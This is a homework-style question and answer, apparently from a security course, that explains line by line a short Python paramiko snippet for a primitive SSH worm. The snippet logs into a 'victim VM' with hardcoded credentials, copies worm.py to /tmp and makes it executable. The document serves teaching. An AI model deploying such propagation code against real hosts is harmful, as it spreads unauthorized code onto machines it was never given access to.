Question

Consider the following code for implementing a primitive SSH worm in Python. Explain what each line does:

import paramiko

ssh = paramiko . SSHClient ()

ssh . set missing host key policy (paramiko . AutoAddPolicy ())

ssh . connect(”<IP OF THE VICTIM VM>”, username=”cpsc ” , password=”cpsc ”)

sftpClient = ssh . open sftp ()

sftpClient . put(”worm.py” , ”/tmp/” + ”worm.py”)

ssh . exec command(”chmod a+x /tmp/worm. py”)

Answer 1

import paramiko

ssh = paramiko.SSHClient() #Create a new SSHClient instance

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #Set policy to use when connecting to servers without a known host key. Policy for automatically adding the hostname and new host key to the local HostKeys object, and saving it. This is used by SSHClient.

ssh.connect("<IP OF THE VICTIM VM>", username="cpsc" , password="cpsc") # Establish a ssh connection to the host with ip address as <IP OF THE VICTIM VM>, username as cpsc and password as cpsc. This is similar to execting command "ssh cpsc@<IP OF THE VICTIM VM>" and then entering the password "cpsc".

sftpClient = ssh.open_sftp() #Open an SFTP(Secure File Transfer Protocol) session on the SSH server and returns a new SFTPClient session object

sftpClient.put("worm.py" , "/tmp/"+"worm.py") # Copy worm.py to the SFTP server at path "/tmp/worm.py"

ssh.exec_command("chmod a+x /tmp/worm.py") # Changing the read write execute permission of worm.py to execute permission to all users by exeuting the shell command chmod

Explanation:

SSH is typically used to log into a remote machine and execute commands. To connect to a remote host we use "ssh username@ip" and then password to connect. paramiko is a package that provides python ssh interfacing utilities to connect to a remote client. This program connects and transfers worm.py to the remote server to path tmp/worm.py and change its read write permission to execute permission by all users of the remote system using chmod linux utility.